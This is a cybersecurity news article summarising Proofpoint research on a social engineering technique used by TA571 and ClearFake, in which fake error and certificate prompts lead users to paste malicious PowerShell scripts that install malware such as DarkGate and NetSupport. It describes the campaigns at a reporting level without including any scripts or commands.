18 June 2024

Cybercriminals use new social engineering tactic for running PowerShell and installing malware


Cybercriminals use new social engineering tactic for running PowerShell and installing malware

A threat actor known as TA571 and the ClearFake activity cluster have been observed employing an innovative social engineering technique designed to manipulate users into executing malicious PowerShell scripts and infecting victim devices with malware.

The technique, detailed by Proofpoint researchers, involves directing users to copy and paste malicious PowerShell scripts that lead to the deployment of various malicious tools, including DarkGate, Matanbuchus, NetSupport, and several information stealers.

Regardless of whether the initial campaign starts via malicious spam (malspam) or web browser injects, the technique follows a similar pattern. Users are presented with a pop-up message displaying an error while trying to open a document or webpage. Instructions are then provided to copy and paste a script into either the PowerShell terminal or the Windows Run dialog box, triggering the execution of the malicious script.

Proofpoint first observed TA571 employing this technique in March 2024, and the ClearFake cluster began using it in early April. ClearFake campaigns involve compromising legitimate websites with malicious HTML and JavaScript, presenting users with fake browser update prompts.

When users visit a compromised site, an injection loads a malicious script hosted on the blockchain via Binance’s Smart Chain contracts—a method known as “EtherHiding.” This script loads a second script from a domain using Keitaro TDS for filtering. If the victim continues to browse the site, they see a fake warning overlay instructing them to install a “root certificate.” Following the instructions leads to executing a PowerShell script.

Back to the list

Latest Posts

Daggerfly APT targets Taiwanese orgs and US NGO in China with upgraded malware arsenal

Daggerfly APT targets Taiwanese orgs and US NGO in China with upgraded malware arsenal

The attackers exploited a bug in an Apache HTTP server to deliver the MgBot malware.
23 July 2024
New FrostyGoop ICS malware left over 600 apartment buildings in Ukraine without heat

New FrostyGoop ICS malware left over 600 apartment buildings in Ukraine without heat

The attackers likely gained access through a vulnerability in an externally facing Mikrotik router.
23 July 2024
NCA infiltrates, disrupts Digitalstress DDoS-for-Hire service

NCA infiltrates, disrupts Digitalstress DDoS-for-Hire service

The crackdown follows the arrest of one of the site's suspected admins earlier this month.
23 July 2024